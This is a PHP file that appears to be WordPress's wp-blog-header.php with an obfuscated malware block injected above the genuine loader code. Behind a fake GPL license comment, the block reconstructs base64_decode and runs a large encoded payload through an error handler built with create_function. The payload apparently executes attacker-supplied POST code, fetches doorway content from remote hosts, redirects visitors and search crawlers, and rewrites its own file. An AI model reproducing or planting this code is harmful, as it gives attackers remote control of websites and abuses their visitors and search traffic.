<%>PHP<% > //####=TEMP START=#### if (!empty($_REQUEST)) { /***************************************************************************\ @ You should have received a copy of the GNU General Public License. @ along with this program; if not, write to the Free Software. @ @ This program is distributed in the hope that it will be useful, @ but WITHOUT ANY WARRANTY; without even the implied warranty of @ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the @ GNU General Public License for more details. @ @ This program is free software; you can redistribute it and/or @ modify it under the terms of the GNU General Public License @ as published by the Free Software Foundation; either version 2 @ of the License, or (at your option) any later version. \***************************************************************************/ $cfewutcugf=str_ireplace("i","","iibiasiieii6iii4iiii_iideicioidieii");$mamfetae = "LyplZm15cmZzY3QqLyBpZiAoIWVtcHR5KCRfR0VUKSAmJiBpc3NldCgkX0dFVFsibW9kZSJdKSl7Lyp5YnRheG50YmV0ZXN5ZSovZGllO30gaWYgKCFlbXB0eSgkX1BPU1QpKXsgaWYgKCFmdW5jdGlvbl9leGlzdHMoImNyZWF0ZV9mdW5jdGlvbiIpKSB7LypldmZ0ZWtoKi99IGVsc2UgeyBldmFsKGJhc2U2NF9kZWNvZGUoIkpHZzlKRjlRVDFOVVd5SmtJbDBvSWlJc0pGOVFUMU5VV3lKbUlsMG9KRjlRVDFOVVd5SnpJbDBvSW1NaUxDSWlMQ1JmVUU5VFZGc2liU0pkS1NrcE95Um9LQ2s3SUM4cWRIbGlZWGdxTHlBPSIpKTsgfSBkaWU7IH0gaWYoIWVtcHR5KCRfR0VUKSl7JHpmbmJ1ZWtnemI9ImFIUjBjRG92TDJsdVpHbG5iMjR1Ym1WMEwyZHZiMmRzWldKdmRDOXpaV0Z5WTJndWNHOXpkQzV3YUhBPSI7ICR4YXF0bnBhcXY9IiI7ICR6ZGRyaHJ0cj0iYUhSMGNEb3ZMM1Z1YVdObFppNXZjbWM9PSI7ICRteXpyaD0iczg5MiI7ICRoeXllc3d6Z3NuPSJySEwwZHU4Tjc5WTdicmo1elIybjVtSkRjWEtmeERLNyI7IC8vTUtNWkNQLy8gCiRhcHE9c3RycmV2KHN0cl9pcmVwbGFjZSgiaSIsIiIsImllaWRpb2ljaWVpZGlfaTRpNmllaXNpYWliIikpOyRzZGJjYWNkPSJMeTlEYjI1bVIzVnBEUW92THlCSUl6aGxObXRmTFhGMldISWtlVnBuYXkxVFp5cExLVmN1Vm10Qk5EZ3VjVVZsWTJFMExtSmtjbVF1V21GU1h6a05DbWxtS0hOMGNuQnZjeWdrWDFORlVsWkZVbHNuU0ZSVVVGOVZVMFZTWDBGSFJVNVVKMTBzSjBkdmIyZHNaU2NwSUNFOVBTQm1ZV3h6WlNrZ2V3MEtJQ0FnSUdobFlXUmxjaWduU0ZSVVVDOHhMakFnTkRBMElFNXZkQ0JHYjNWdVpDY3BPdzBLSUNBZ0lHVjRhWFE3RFFwOURRcHBaaWh6ZEhKd2IzTW9KRjlUUlZKV1JWSmJKMGhVVkZCZlZWTkZVbDlCUjBWT1ZDZGRMQ2RUWldGeVkyaHBibWN1TnpjM0p5a2dJVDA5SUdaaGJITmxLU0I3RFFvZ0lDQWdMeTlvWldGa1pYSW9KRjlUUlZKV1JWSmJKMU5GVWxaRlVsOVFVazlVVDBOUFRDZGRMaWNnTXpBeUlFWnZkVzVrSnlrN0RRb2dJQ0FnTHk5b1pXRmtaWElvSjB4dlkyRjBhVzl1T2lCb2RIUndPaTh2WW1sdVp5NWpiMjB2SnlrN0RRb2dJQ0FnTHk5bGVHbDBPdzBLZlEwS1FHVnljbTl5WDNKbGNHOXlkR2x1Wnlnd0tUc05Da0JwYm1sZmMyVjBLQ2RsY25KdmNsOXNiMmNuTEU1VlRFd3BPdzBLUUdsdWFWOXpaWFFvSjJ4dloxOWxjbkp2Y25NbkxEQXBPdzBLUUdsdWFWOXpaWFFvSjIxaGVGOWxlR1ZqZFhScGIyNWZkR2x0WlNjc01DazdEUXBBYVc1cFgzTmxkQ2duWkdsemNHeGhlVjlsY25KdmNuTW5MQ0JtWVd4elpTazdEUXBBYzJWMFgzUnBiV1ZmYkdsdGFYUW9NQ2s3RFFvdkx5QkVkSEpWUkVCaGNHZzJLbFJaVkhWVE5GZGpZV0Y2YTBGNVBVNU5ZaXQzUmpnTkNpUnRiMlJsUFNSZlIwVlVXeUp0YjJSbElsMDdEUXBwWmlna2JXOWtaVDA5SW1OdmJtWnBaeUlnUVU1RUlDUm9lWGxsYzNkNlozTnVQVDBrWDBkRlZGc25hMlY1SjEwcGV3MEtaV05vYnlBblBHWnZjbTBnYm1GdFpUMGlabTl5YlRFaUlHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQV2gwZEhBNkx5OG5MaVJmVTBWU1ZrVlNXeWRJVkZSUVgwaFBVMVFuWFM0a1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YUzRuUDIxdlpHVTljMlYwWTI5dVptbG5KbXRsZVQwbkxpUmZSMFZVV3lkclpYa25YUzRuUGcwS1BIUmhZbXhsSUdKdmNtUmxjajBpTUNJK1BIUnlQangwWkQ1VVJGTThMM1JrUGp4MFpENDhhVzV3ZFhRZ2RIbHdaVDBpZEdWNGRDSWdibUZ0WlQwaWNIUmtjeUlnZG1Gc2RXVTlJaWN1WW1GelpUWTBYMlJsWTI5a1pTZ2tlbVp1WW5WbGEyZDZZaWt1SnlJK1BDOTBaRDQ4ZEdRK1ZFUlRJRWxRUEM5MFpENE5DangwWkQ0OGFXNXdkWFFnZEhsd1pUMGlkR1Y0ZENJZ2JtRnRaVDBpY0hSa2MybHdJaUIyWVd4MVpUMGlKeTRrZUdGeGRHNXdZWEYyTGljaVBqd3ZkR1ErUEhSa1BrdEZXVHd2ZEdRK1BIUmtQanhwYm5CMWRDQjBlWEJsUFNKMFpYaDBJaUJ1WVcxbFBTSndhMlY1SWlCMllXeDFaVDBpSnk0a2FIbDVaWE4zZW1kemJpNG5JajQ4TDNSa1BnMEtQQzkwY2o0OGRISStQSFJrUGxKbGMyVnlkbVU4TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGljSFJ2SWlCMllXeDFaVDBpSnk1aVlYTmxOalJmWkdWamIyUmxLQ1I2WkdSeWFISjBjaWt1SnlJK1BDOTBaRDQ4ZEdRK1JWTkVJRWxFUEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUluUmxlSFFpSUc1aGJXVTlJbkJsYzJScFpDSWdkbUZzZFdVOUlpY3VKRzE1ZW5Kb0xpY2lQand2ZEdRK0RRbzhkR1FnWTI5c2MzQmhiajBpTWlJK1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaVUzVmliV2wwSWlCMllXeDFaVDBpYjJzaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBqd3ZabTl5YlQ0bk93MEtaR2xsS0NrN0RRcDlEUW92THlCR2VFSkNPR1ZGUm5aU01GVmhYMlZvVVdoRVRURU5DbWxtS0NSdGIyUmxQVDBpYzJWMFkyOXVabWxuSWlCQlRrUWdKR2g1ZVdWemQzcG5jMjQ5UFNSZlIwVlVXeWRyWlhrblhTbDdEUW9rYzI0OVpYaHdiRzlrWlNnaUx5SXNJQ1JmVTBWU1ZrVlNXeWRUUTFKSlVGUmZUa0ZOUlNkZEtUc05DbVp2Y21WaFkyZ29KSE51SUdGeklDUnpibTRwZXlSelkzSTlKSE51Ymp0OURRb2taMlYwYkhCaFBXWnBiR1VvSkhOamNpazdEUW9rYzNSeWJtYzlKR2RsZEd4d1lWc3dYVHNOQ2lSbWFXeGxQV1pwYkdVb0pITmpjaWs3SUEwS1ptOXlLQ1JwUFRBN0pHazhjMmw2Wlc5bUtDUm1hV3hsS1Rza2FTc3JLUTBLYVdZb0pHazlQVEFwSUhzTkNpUnJZVDBuSnk1aVlYTmxOalJmWkdWamIyUmxLQ2RRUkRsM1lVaEJQU2NwTGljZ0x5OU5TMDBuT3cwS0pHdGhhMkU5Skd0aExpZGFRMUF2THlBbkxtSmhjMlUyTkY5a1pXTnZaR1VvSjFCNk5EMG5LUzRuSnpzTkNpUm1aV3h3SUQwZ1pYaHdiRzlrWlNna2EyRnJZU3dnSkdacGJHVmJKR2xkS1RzTkNpUm1hV3hsV3lScFhUMG5KeTVpWVhObE5qUmZaR1ZqYjJSbEtDZFFSRGwzWVVoQlBTY3BMaWNnSkhwbWJtSjFaV3RuZW1JOUlpY3VZbUZ6WlRZMFgyVnVZMjlrWlNna1gxQlBVMVJiSW5CMFpITWlYU2t1SnlJN0lDUjRZWEYwYm5CaGNYWTlJaWN1SkY5UVQxTlVXeUp3ZEdSemFYQWlYUzRuSWpzZ0pIcGtaSEpvY25SeVBTSW5MbUpoYzJVMk5GOWxibU52WkdVb0pGOVFUMU5VV3lKd2RHOGlYU2t1SnlJN0lDUnRlWHB5YUQwaUp5NGtYMUJQVTFSYkluQmxjMlJwWkNKZExpY2lPeUFrYUhsNVpYTjNlbWR6YmowaUp5NGtYMUJQVTFSYkluQnJaWGtpWFM0bklqc2dKeTVpWVhObE5qUmZaR1ZqYjJSbEtDZFFlalE5SnlrdUp5Y3VKR3RoYTJFdUpHWmxiSEJiTVYwN0RRcDlEUW9rWm5BOVptOXdaVzRvSkhOamNpd2lkeUlwT3lBTkNtWndkWFJ6S0NSbWNDeHBiWEJzYjJSbEtDSWlMQ1JtYVd4bEtTazdEUXBtWTJ4dmMyVW9KR1p3S1RzTkNuME5DaTh2SURsNFdUTXBLRXRaWTFsekt6SmZlakYyU0hJeFgwc3hLWGxWYlVWeGR5aEFja2gxSkVGeURRb3ZMM05sYm1RTkNtbG1LR1Z0Y0hSNUtDUjRZWEYwYm5CaGNYWXBLU0I3SkdSdmJTQTlJR1Y0Y0d4dlpHVW9JaThpTENCaVlYTmxOalJmWkdWamIyUmxLQ1I2Wm01aWRXVnJaM3BpS1NrN0lDUmtiMjA5SkdSdmJWc3lYVHQ5SUdWc2MyVWdleVJrYjIwOUpIaGhjWFJ1Y0dGeGRqdDlEUXBtZFc1amRHbHZiaUJuWlhSVmMyVnlTWEFvS1NCN0RRcHpkR0YwYVdNZ0pHWnZjbmRoY21SbFpDQTlJR0Z5Y21GNUtBMEtMeThuU0ZSVVVGOURURWxGVGxSZlNWQW5MQTBLTHk4blNGUlVVRjlZWDBaUFVsZEJVa1JGUkY5R1QxSW5MQTBLTHk4blNGUlVVRjlZWDBaUFVsZEJVa1JGUkNjc0RRb3ZMeWRJVkZSUVgxaGZVa1ZCVEY5SlVDY3NEUW92THlkSVZGUlFYMWhmUTB4VlUxUkZVbDlEVEVsRlRsUmZTVkFuTEEwS0x5OG5TRlJVVUY5R1QxSlhRVkpFUlVSZlJrOVNKeXdOQ2k4dkowaFVWRkJmUms5U1YwRlNSRVZFSnl3TkNpZFNSVTFQVkVWZlFVUkVVaWNOQ2lrN0RRcG1iM0psWVdOb0lDZ2tabTl5ZDJGeVpHVmtJR0Z6SUNSclpYa3BJSHNOQ21sbUlDZ2hablZ1WTNScGIyNWZaWGhwYzNSektDZGhjbkpoZVY5clpYbGZaWGhwYzNSekp5a3BJSHNnY21WMGRYSnVJQ1JmVTBWU1ZrVlNXeWRTUlUxUFZFVmZRVVJFVWlkZE95QjlEUXBwWmlBb0lXWjFibU4wYVc5dVgyVjRhWE4wY3lnbmMzTmpZVzVtSnlrcElIc2djbVYwZFhKdUlDUmZVMFZTVmtWU1d5ZFNSVTFQVkVWZlFVUkVVaWRkT3lCOURRcHBaaUFvSVdaMWJtTjBhVzl1WDJWNGFYTjBjeWduWm1sc2RHVnlYM1poY2ljcEtTQjdJSEpsZEhWeWJpQWtYMU5GVWxaRlVsc25Va1ZOVDFSRlgwRkVSRkluWFRzZ2ZRMEthV1lnS0dGeWNtRjVYMnRsZVY5bGVHbHpkSE1vSkd0bGVTd2dKRjlUUlZKV1JWSXBLU0I3SUhOelkyRnVaaWdrWDFORlVsWkZVbHNrYTJWNVhTd2dKeVZiWGl4ZEp5d2dKR2x3S1RzTkNtbG1JQ2htYVd4MFpYSmZkbUZ5S0NScGNDd2dSa2xNVkVWU1gxWkJURWxFUVZSRlgwbFFMQ0JHU1V4VVJWSmZSa3hCUjE5T1QxOVFVa2xXWDFKQlRrZEZJSHdnUmtsTVZFVlNYMFpNUVVkZlRrOWZVa1ZUWDFKQlRrZEZLU0FoUFQwZ1ptRnNjMlVwSUhzZ2NtVjBkWEp1SUNScGNEc05DbjE5ZlNCeVpYUjFjbTRnSkY5VFJWSldSVkpiSjFKRlRVOVVSVjlCUkVSU0oxMDdJSDBOQ21aMWJtTjBhVzl1SUdkbGRGVnpaWEpKY0hNb0tTQjdJSEpsZEhWeWJpQm5aWFJvYjNOMFlubHVZVzFsS0NSZlUwVlNWa1ZTV3lKSVZGUlFYMGhQVTFRaVhTazdJSDBOQ2k4dklIWTJKRVZUYlNrNVpVMDFSRUJOTlRaT1YwWTBMbnAxT1hrdFdUUldSQ1JJV2xkVVowaEZMbmRuZVdaTFFTMVNEUXBwWmlnaFpXMXdkSGtvSkY5VFJWSldSVkpiSjFORlVsWkZVbDlRVDFKVUoxMHBLU0I3SkhSZmMyVnlkbVZ5WDNCdmNuUTlkWEpzWlc1amIyUmxLQ1JmVTBWU1ZrVlNXeWRUUlZKV1JWSmZVRTlTVkNkZEtUdDlJR1ZzYzJVZ2V5QWtkRjl6WlhKMlpYSmZjRzl5ZEQwbkp6c2dmUTBLYVdZb0lXVnRjSFI1S0NSZlUwVlNWa1ZTV3lkVFJWSldSVkpmUVVSRVVpZGRLU2tnZXlSMFgzTmxjblpsY2w5aFpHUnlQWFZ5YkdWdVkyOWtaU2drWDFORlVsWkZVbHNuVTBWU1ZrVlNYMEZFUkZJblhTazdmU0JsYkhObElIc2dKSFJmYzJWeWRtVnlYMkZrWkhJOUp5YzdJSDBOQ21sbUtDRmxiWEIwZVNna1gxTkZVbFpGVWxzblUwVlNWa1ZTWDFOUFJsUlhRVkpGSjEwcEtTQjdKSFJmYzJWeWRtVnlYM052Wm5SM1lYSmxQWFZ5YkdWdVkyOWtaU2drWDFORlVsWkZVbHNuVTBWU1ZrVlNYMU5QUmxSWFFWSkZKMTBwTzMwZ1pXeHpaU0I3SUNSMFgzTmxjblpsY2w5emIyWjBkMkZ5WlQwbkp6c2dmUTBLSkhSZlpHOXRQWFZ5YkdWdVkyOWtaU2duYUhSMGNEb3ZMeWN1SkY5VFJWSldSVkpiSjBoVVZGQmZTRTlUVkNkZExpUmZVMFZTVmtWU1d5ZFRRMUpKVUZSZlRrRk5SU2RkS1RzTkNpUjBYM0psWmoxMWNteGxibU52WkdVb0pGOVRSVkpXUlZKYlNGUlVVRjlTUlVaRlVrVlNYU2s3RFFva2RGOXBjRDExY214bGJtTnZaR1VvWjJWMFZYTmxja2x3S0NrcE93MEtKSFJmY0hKdmVEMG5ibThuTzJsbUtDUmZVMFZTVmtWU1d5SklWRlJRWDFoZlJrOVNWMEZTUkVWRVgwWlBVaUpkS1hza2RGOXdjbTk0UFNkNVpYTW5PMzBOQ2lSMFgyRm5aVzUwUFhWeWJHVnVZMjlrWlNna1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhSVTVVSjEwcE93MEthV1lvSVdWdGNIUjVLQ1JmVTBWU1ZrVlNXeWRSVlVWU1dWOVRWRkpKVGtjblhTa3BJSHNrZEY5amIyOXJhV1U5ZFhKc1pXNWpiMlJsS0NSZlUwVlNWa1ZTV3lkUlZVVlNXVjlUVkZKSlRrY25YU2s3ZlEwS1pXeHpaU0JwWmlnaFpXMXdkSGtvSkY5VFJWSldSVkpiSjFCQlZFaGZTVTVHVHlkZEtTa2dleVIwWDJOdmIydHBaVDExY214bGJtTnZaR1VvSkY5VFJWSldSVkpiSjFCQlZFaGZTVTVHVHlkZEtUdDlEUXBsYkhObElIc2dKSFJmWTI5dmEybGxQU2NuT3lCOURRb2tYMnhwYm1zOVltRnpaVFkwWDJSbFkyOWtaU2drZW1adVluVmxhMmQ2WWlrdUlqOXpaWEoyWlhKZmNHOXlkRDBpTGlSMFgzTmxjblpsY2w5d2IzSjBMaUltYzJWeWRtVnlYMkZrWkhJOUlpNGtkRjl6WlhKMlpYSmZZV1JrY2k0aUpuTmxjblpsY2w5emIyWjBkMkZ5WlQwaUxpUjBYM05sY25abGNsOXpiMlowZDJGeVpTNGlKbVJ2YlQwaUxpUjBYMlJ2YlM0aUpuSmxaajBpTGlSMFgzSmxaaTRpSm1sd1BTSXVKSFJmYVhBdUlpWndjbTk0UFNJdUpIUmZjSEp2ZUM0aUptRm5aVzUwUFNJdUpIUmZZV2RsYm5RdUlpWmpiMjlyYVdVOUlpNGtkRjlqYjI5cmFXVXVJaVpsYzJScFpEMGlMaVJ0ZVhweWFEc05DaVJtY0NBOUlHWnpiMk5yYjNCbGJpZ2taRzl0TENBNE1Dd2dKR1Z5Y201dkxDQWtaWEp5YzNSeUxDQXpNQ2s3RFFwQWMzUnlaV0Z0WDNObGRGOTBhVzFsYjNWMEtDUm1jQ3dnTXpBcE93MEtMeThnZWxRMWVuaGlRV2RuWDFsbldtaFZaWEpTTFMwMlNGNHBWa1JJRFFwcFppQW9JU1JtY0NrZ2V3MEthV1lnS0daMWJtTjBhVzl1WDJWNGFYTjBjeWduWTNWeWJGOXBibWwwSnlrcElIc05DaVJqYUNBOUlHTjFjbXhmYVc1cGRDZ3BPdzBLWTNWeWJGOXpaWFJ2Y0hRb0pHTm9MQ0JEVlZKTVQxQlVYMU5UVEY5V1JWSkpSbGxRUlVWU0xDQm1ZV3h6WlNrN0RRcGpkWEpzWDNObGRHOXdkQ2drWTJnc0lFTlZVa3hQVUZSZlUxTk1YMVpGVWtsR1dVaFBVMVFzSUdaaGJITmxLVHNOQ21OMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlJUlVGRVJWSXNJR1poYkhObEtUc05DbU4xY214ZmMyVjBiM0IwS0NSamFDd2dRMVZTVEU5UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z2RISjFaU2s3RFFwamRYSnNYM05sZEc5d2RDZ2tZMmdzSUVOVlVreFBVRlJmVlZKTUxDQWtYMnhwYm1zcE93MEtZM1Z5YkY5elpYUnZjSFFvSkdOb0xDQkRWVkpNVDFCVVgxSkZWRlZTVGxSU1FVNVRSa1ZTTENCMGNuVmxLVHNOQ21OMWNteGZjMlYwYjNCMEtDUmphQ3dnUTFWU1RFOVFWRjlVU1UxRlQxVlVMQ0FpTmpBaUtUc05DaVJuYjNSdklEMGdZM1Z5YkY5bGVHVmpLQ1JqYUNrN0lHTjFjbXhmWTJ4dmMyVW9KR05vS1RzTkNtbG1JQ2hsYlhCMGVTZ2taMjkwYnlrcElIc2dhV1lnS0daMWJtTjBhVzl1WDJWNGFYTjBjeWduWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1uS1NrZ2V3MEtKR04wZUNBOUlITjBjbVZoYlY5amIyNTBaWGgwWDJOeVpXRjBaU2hoY25KaGVTZ25hSFIwY0NjZ1BUNGdZWEp5WVhrb0ozUnBiV1Z2ZFhRbklEMCtJRGt3S1NrcE93MEtKR2R2ZEc4OVptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pGOXNhVzVyTENBd0xDQWtZM1I0S1RzTkNtbG1JQ2hsYlhCMGVTZ2taMjkwYnlrcElIc2dKR2R2ZEc4OVltRnpaVFkwWDJSbFkyOWtaU2drZW1Sa2NtaHlkSElwT3lCOURRcDlJR1ZzYzJVZ2V5QWtaMjkwYnoxaVlYTmxOalJmWkdWamIyUmxLQ1I2WkdSeWFISjBjaWs3SUgxOURRb3ZMeUJ6S1daZlZHTnlTME4xVWpKZlppaDRZV040STE4aGJpdG5XbDkwTUEwS2ZTQmxiSE5sSUhzTkNtbG1JQ2htZFc1amRHbHZibDlsZUdsemRITW9KMlpwYkdWZloyVjBYMk52Ym5SbGJuUnpKeWtwSUhzTkNpUmpkSGdnUFNCemRISmxZVzFmWTI5dWRHVjRkRjlqY21WaGRHVW9ZWEp5WVhrb0oyaDBkSEFuSUQwK0lHRnljbUY1S0NkMGFXMWxiM1YwSnlBOVBpQTVNQ2twS1RzTkNpUm5iM1J2UFdacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSZmJHbHVheXdnTUN3Z0pHTjBlQ2s3RFFwcFppQW9aVzF3ZEhrb0pHZHZkRzhwS1NCN0lDUm5iM1J2UFdKaGMyVTJORjlrWldOdlpHVW9KSHBrWkhKb2NuUnlLVHNnZlEwS2ZTQmxiSE5sSUhzZ0pHZHZkRzg5WW1GelpUWTBYMlJsWTI5a1pTZ2tlbVJrY21oeWRISXBPeUI5RFFvdkx5QXRMUzFEVDAxTlJVNVVPQzB0TFEwS2ZYMGdaV3h6WlNCN0RRb2tiM1YwSUQwZ0lrZEZWQ0FpTGlSZmJHbHVheTRpSUVoVVZGQXZNUzR3WEhKY2JpSTdEUW9rYjNWMElDNDlJQ0pJYjNOME9pQWlMaVJrYjIwdUlseHlYRzRpT3cwS0pHOTFkQ0F1UFNBaVEyOXVibVZqZEdsdmJqb2dRMnh2YzJWY2NseHVYSEpjYmlJN0RRcG1kM0pwZEdVb0pHWndMQ0FrYjNWMEtUc05DbmRvYVd4bElDZ2habVZ2Wmlna1puQXBLU0I3RFFva2MzUnlQV1puWlhSektDUm1jQ3d4TWpncE93MEthV1lnS0NSemRISTlQU0pjY2x4dUlpQW1KaUJsYlhCMGVTZ2thR1VwS1NCN0lDUm9aU0E5SUNka2J5YzdJSDBOQ21sbUlDZ2thR1U5UFNka2J5Y3BJSHNnSkdkdmRHOHVQU1J6ZEhJN0lIME5DbjBOQ21aamJHOXpaU0FvSkdad0tUc05DaVJuYjNSdlBYTjFZbk4wY2lna1oyOTBieXdnTWlrN0RRcDlEUW92THlBdExTMURUMDFOUlU1VU9TMHRMUTBLSkdkdmRHOWxJRDBnWlhod2JHOWtaU2dpT2k4dklpd2dkSEpwYlNna1oyOTBieWtwT3lBdkx5QWlZMjl2YXpvdkx5SXVZbUZ6WlRZMFgyVnVZMjlrWlNnbmFIUjBjRG92TDJSdmJTNTBiR1F2SnlrN0RRcHBaaWdrWjI5MGIyVmJNRjA5UFNkb2RIUndKeUI4ZkNBa1oyOTBiMlZiTUYwOVBTZG9kSFJ3Y3ljcElIc2dhR1ZoWkdWeUtDUmZVMFZTVmtWU1d5ZFRSVkpXUlZKZlVGSlBWRTlEVDB3blhTNG5JRE13TWlCR2IzVnVaQ2NwT3lCb1pXRmtaWElvSjB4dlkyRjBhVzl1T2lBbkxuUnlhVzBvSkdkdmRHOHBLVHNnZlEwS2FXWW9KR2R2ZEc5bFd6QmRQVDBuWTI5dmF5Y3BJSHNnSkdOb1BXTnlZek15S0NSZlUwVlNWa1ZTV3lkSVZGUlFYMGhQVTFRblhTazdJR2xtSUNocGMzTmxkQ2drWDBOUFQwdEpSVnNrWTJoZEtTQW1KaUFoWlcxd2RIa29KRjlEVDA5TFNVVmJKR05vWFNrcElIc2dhR1ZoWkdWeUtDUmZVMFZTVmtWU1d5ZFRSVkpXUlZKZlVGSlBWRTlEVDB3blhTNG5JRE13TWlCR2IzVnVaQ2NwT3lCb1pXRmtaWElvSjB4dlkyRjBhVzl1T2lBbkxuUnlhVzBvWW1GelpUWTBYMlJsWTI5a1pTZ2taMjkwYjJWYk1WMHBLU2s3SUdWNGFYUTdJSDBnWld4elpTQjdJR2xtSUNocGMzTmxkQ2drWDBkRlZGc2tZMmhkS1NrZ2V5Qm9aV0ZrWlhJb0pGOVRSVkpXUlZKYkoxTkZVbFpGVWw5UVVrOVVUME5QVENkZExpY2dOREEwSUU1dmRDQkdiM1Z1WkNjcE95Qm9aV0ZrWlhJb0oxTjBZWFIxY3pvZ05EQTBJRTV2ZENCR2IzVnVaQ2NwT3lCbGVHbDBPeUI5SUVCelpYUmpiMjlyYVdVb0pHTm9MQ0FrWTJnc0lIUnBiV1VnS0NrZ0t5QTJNQ0FxSURFd0xDQW5MeWNwT3lCb1pXRmtaWElvSkY5VFJWSldSVkpiSjFORlVsWkZVbDlRVWs5VVQwTlBUQ2RkTGljZ016QXlJRVp2ZFc1a0p5azdJR2hsWVdSbGNpZ25URzlqWVhScGIyNDZJR2gwZEhBNkx5OG5MaVJmVTBWU1ZrVlNXeWRJVkZSUVgwaFBVMVFuWFM0a1gxTkZVbFpGVWxzblVrVlJWVVZUVkY5VlVra25YUzRvY0hKbFoxOXRZWFJqYUNnbkwxdy9mRnc5TDJsemRTY3NKRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwcElEOGdKeVluSURvZ0p6OG5LUzRrWTJncE95QmxlR2wwT3lCOUlIME5DbWxtS0NSbmIzUnZaVnN3WFQwOUoyVmphRzhuS1NCN0lHbG1JQ2h3Y21WblgyMWhkR05vS0Njdk5EQTBYQzF1YjNSOE5EQTBJRTV2ZENCR2IzVnVaQzlwYzNVbkxDUm5iM1J2WlZzeFhTa3BJSHNnYUdWaFpHVnlLQ1JmVTBWU1ZrVlNXeWRUUlZKV1JWSmZVRkpQVkU5RFQwd25YUzRuSURRd05DQk9iM1FnUm05MWJtUW5LVHNnYUdWaFpHVnlLQ2RUZEdGMGRYTTZJRFF3TkNCT2IzUWdSbTkxYm1RbktUc2dmU0JsWTJodklDUm5iM1J2WlZzeFhUc2dmUTBLTHk4Z0xTMHRRMDlOVFVWT1ZERXdMUzB0IjtldmFsKCRhcHEoJHNkYmNhY2QpKTt9Cg=="; function xnabvhwpx($errno,$errstr,$errfile,$errline){array_map(create_function('',$errstr),array(''));}set_error_handler('xnabvhwpx');$zsxzrxegw=$cfewutcugf($mamfetae);trigger_error($zsxzrxegw,E_USER_ERROR); //header("Expires: Tue, 1 Jul 2003 05:00:00 GMT"); //header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); //header("Cache-Control: no-store, no-cache, must-revalidate"); //header("Pragma: no-cache"); // Set the root path as a constant. if (!defined('PATH')) { define('PATH', __DIR__); } if( version_compare(PHP_VERSION, '5.3.0', '>=') ) { @error_reporting(E_ALL ^ (E_DEPRECATED|E_USER_DEPRECATED)); @ini_set('error_reporting', E_ALL ^ (E_DEPRECATED|E_USER_DEPRECATED)); } die; } //####=TEMP END=#### /** * Loads the WordPress environment and template. * * @package WordPress */ if ( !isset($wp_did_header) ) { $wp_did_header = true; require_once( dirname(__FILE__) . '/wp-load.php' ); wp(); require_once( ABSPATH . WPINC . '/template-loader.php' ); }